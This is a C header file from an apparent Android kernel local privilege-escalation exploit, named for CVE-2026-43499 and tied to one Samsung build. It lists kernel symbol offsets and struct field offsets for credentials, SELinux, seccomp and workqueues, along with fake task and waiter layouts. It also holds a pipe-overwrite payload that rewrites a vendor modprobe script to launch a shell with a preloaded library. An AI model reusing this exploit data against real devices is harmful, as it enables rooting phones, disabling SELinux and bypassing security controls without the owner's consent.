#ifndef OFFSET_H
#define OFFSET_H

#define BUILD_VARIANT_LABEL "q8q-F976U1UEU1AZFW"

#ifndef BUILD_FINGERPRINT
#define BUILD_FINGERPRINT \
  "samsung/q8qoyn/q8q:17/CP2A.260605.016/F976U1UEU1AZFW:user/release-keys"
#endif

#define KIMAGE_TEXT_BASE 0xffffffc080000000ULL
#define P0_PAGE_OFFSET   0xffffff8000000000ULL
#define P0_PHYS_OFFSET   0x80000000ULL

#ifdef ANDROID_TARGET
#define P0_KERNEL_PHYS_LOAD 0xc7800000ULL
#define PIPE_OVERWRITE_TARGET "/vendor/bin/vendor_modprobe.sh"
#define PIPE_OVERWRITE_CONTENT \
    "!/system/bin/sh\n" \
    "log -t GHOSTLOCK `id`\n" \
    "LD_PRELOAD=/data/local/tmp/preload.so ROOT_STAGE=1 sh\n" \
    "exit\n"
#else /* QEMU */
#define P0_KERNEL_PHYS_LOAD 0xa8000000ULL
#define PIPE_OVERWRITE_TARGET "/usr/sbin/selabel_digest"
#define PIPE_OVERWRITE_CONTENT \
    "#!/bin/sh\n" \
    "echo GHOSTLOCK_PIPE_SUCCESS\n"
#endif

#define SLIDE_TRACEFS_EVENT_ID           110

#define SLIDE_TRACEFS_WORKER_CALLER_OFF  0x1fa480ULL

#define KERNELSNITCH_IDENTITY_START 0xffffff8000000000ULL
#define KERNELSNITCH_IDENTITY_END   0xffffff9000000000ULL
#define DIRECT_MAP_BASE 0xffffff8000000000ULL
#define DIRECT_MAP_END  0xffffff9000000000ULL
#define VMEMMAP_START   0xfffffffe00000000ULL


#define ANON_PIPE_BUF_OPS_OFF        0x0138b8c8ULL
#define CAP_CAPABLE_ACTIVE_OFF       0x008f2d8cULL
#define EMPTY_ZERO_PAGE_OFF          0x02894000ULL
#define INIT_CRED_OFF                0x026738f0ULL
#define INIT_TASK_OFF                0x0265db80ULL
#define KMALLOC_CACHES_OFF           0x01a104c0ULL
#define KPTR_RESTRICT_OFF            0x0265c2d0ULL
#define NOOP_LLSEEK_OFF              0x006c36d8ULL
#define ROOT_TASK_GROUP_OFF          0x0289c5c0ULL
#define SELINUX_BLOB_SIZES_OFF       0x01a1a868ULL
#define SELINUX_ENFORCING_OFF        0x028ebc80ULL
#define SLIDE_RANDOM_BOOT_ID_DATA_OFF 0x0002780298ULL
#define SLIDE_SYSCTL_BOOTID_OFF      0x029d0050ULL
#define MISC_LIST_OFF                0x02780330ULL
#define CALL_USERMODEHELPER_EXEC_WORK_OFF 0x004808b0ULL
#define SYSTEM_UNBOUND_WQ_OFF        0x01a10250ULL

#define NOOP_LLSEEK      (KIMAGE_TEXT_BASE + NOOP_LLSEEK_OFF)
#define INIT_TASK        (KIMAGE_TEXT_BASE + INIT_TASK_OFF)
#define ROOT_TASK_GROUP  (KIMAGE_TEXT_BASE + ROOT_TASK_GROUP_OFF)
#define SELINUX_ENFORCING (KIMAGE_TEXT_BASE + SELINUX_ENFORCING_OFF)
#define KMALLOC_CACHES   (KIMAGE_TEXT_BASE + KMALLOC_CACHES_OFF)
#define ANON_PIPE_BUF_OPS (KIMAGE_TEXT_BASE + ANON_PIPE_BUF_OPS_OFF)
#define MISC_LIST        (KIMAGE_TEXT_BASE + MISC_LIST_OFF)

#define ROOT_UMH_PATH "/data/local/tmp/cve-2026-43499-root"
#define CALL_USERMODEHELPER_EXEC_WORK \
  (KIMAGE_TEXT_BASE + CALL_USERMODEHELPER_EXEC_WORK_OFF)
#define SYSTEM_UNBOUND_WQ (KIMAGE_TEXT_BASE + SYSTEM_UNBOUND_WQ_OFF)
#define ROOT_UMH_WORK_OFF 0x6000
#define ROOT_UMH_DATA_OFF 0x6200

#define SLIDE_RANDOM_BOOT_ID_DATA_IMAGE \
  (KIMAGE_TEXT_BASE + SLIDE_RANDOM_BOOT_ID_DATA_OFF)
#define SLIDE_SYSCTL_BOOTID_IMAGE \
  (KIMAGE_TEXT_BASE + SLIDE_SYSCTL_BOOTID_OFF)

#define LOCK_OFF      0x2210
#define W0_OFF        0x2350
#define SCRATCH_OFF   0x3000
#define RIGHT_OFF     0x4440
#define LEFT_OFF      0x5550
#define PIPE_FLAG_OFF 0x5680
#define FAKE_TASK_OFF 0x3200

#define FAKE_WAITER_TREE_PRIO_OFF       0x18
#define FAKE_WAITER_TREE_DEADLINE_OFF   0x20
#define FAKE_WAITER_PI_TREE_ENTRY_OFF   0x28
#define FAKE_WAITER_PI_TREE_PRIO_OFF    0x40
#define FAKE_WAITER_PI_TREE_DEADLINE_OFF 0x48
#define FAKE_WAITER_TASK_OFF            0x50
#define FAKE_WAITER_LOCK_OFF            0x58
#define FAKE_WAITER_WAKE_STATE_OFF      0x60
#define FAKE_WAITER_WW_CTX_OFF          0x68

#define FAKE_TASK_USAGE_OFF        0x40

#define FAKE_TASK_PRIO_OFF         0x94
#define FAKE_TASK_NORMAL_PRIO_OFF  0x9c

#define FAKE_TASK_TASK_GROUP_OFF   0x420

#define FAKE_TASK_PI_LOCK_OFF      0x9ec

#define FAKE_TASK_PI_WAITERS_OFF   0xa00

#define FAKE_TASK_PI_TOP_TASK_OFF  0xa10

#define FAKE_TASK_PI_BLOCKED_ON_OFF 0xa18

#define CFG_PAGE_OFF           16
#define CFG_NEEDS_READ_FILL_OFF 80
#define CFG_BIN_BUFFER_OFF     88
#define CFG_BIN_BUFFER_SIZE_OFF 96
#define CFG_CB_MAX_SIZE_OFF    100

#define WQ_DFL_PWQ_OFF    0xc0
#define WQ_MAX_ACTIVE_OFF 0xa4
#define MAX_ACTIVE_IN_WQ  1
#define PWQ_POOL_OFF      0x00
#define PWQ_WQ_OFF        0x08
#define PWQ_WORK_COLOR_OFF 0x10
#define PWQ_REFCNT_OFF    0x18
#define PWQ_NR_IN_FLIGHT_OFF 0x1c
#define PWQ_NR_ACTIVE_OFF 0x60
#define POOL_WORKLIST_OFF 0x28
#define POOL_NR_IDLE_OFF  0x3c

#define WORK_DATA_OFF  0x00
#define WORK_ENTRY_OFF 0x08
#define WORK_FUNC_OFF  0x18

#define STRUCT_PAGE_SIZE         0x40
#define STRUCT_PAGE_COMPOUND_HEAD_OFF 0x08
#define STRUCT_SLAB_CACHE_OFF    0x08
#define STRUCT_PAGE_TYPE_OFF     0x30

#define SKB_DATA_DELTA (-0xe80LL)

#define PIPE_BUFFER_SLOTS    32
#define PIPE_BUF_FLAG_CAN_MERGE 0x10
#define PIPE_BUFFER_FLAGS_OFF   0x18


#define CRED_UID_OFF          8
#define CRED_SECUREBITS_OFF   40
#define CRED_CAPS_OFF         48
#define CRED_SECURITY_OFF     128
#define SELINUX_CRED_BLOB_OFF 0
#define SELINUX_CRED_OSID_OFF 0
#define SELINUX_CRED_SID_OFF  4

#define SECCOMP_MODE_OFF         0x00
#define SECCOMP_FILTER_COUNT_OFF 0x04
#define SECCOMP_FILTER_OFF       0x08
#define TIF_SECCOMP_BIT    11
#define PFA_NO_NEW_PRIVS_BIT 0

#define TASK_SAVED_SP_OFF     0xdf8

#define MM_OWNER_OFF            1040
#define TASK_PID_OFF            0x708
#define TASK_TGID_OFF           0x70c
#define TASK_REAL_PARENT_OFF    0x718
#define TASK_ATOMIC_FLAGS_OFF   0x6c8
#define TASK_REAL_CRED_OFF      0x8f8
#define TASK_CRED_OFF           0x900
#define TASK_COMM_OFF           0x910
#define TASK_TASKS_OFF          0x638
#define TASK_THREAD_INFO_FLAGS_OFF 0x00
#define TASK_SECCOMP_OFF        0x9c8

#define SELINUX_BLOB_SIZES  (KIMAGE_TEXT_BASE + SELINUX_BLOB_SIZES_OFF)
#define SECURITY_HOOK_HEADS 0

#define SLIDE_NFULNL_LOGGER_OFF       0x026521d0ULL
#define SLIDE_LOGGERS_0_1_OFF         0x02652118ULL
#define SLIDE_NFULNL_LOGGER_IMAGE     (KIMAGE_TEXT_BASE + SLIDE_NFULNL_LOGGER_OFF)
#define SLIDE_LOGGERS_0_1_IMAGE       (KIMAGE_TEXT_BASE + SLIDE_LOGGERS_0_1_OFF)

#endif
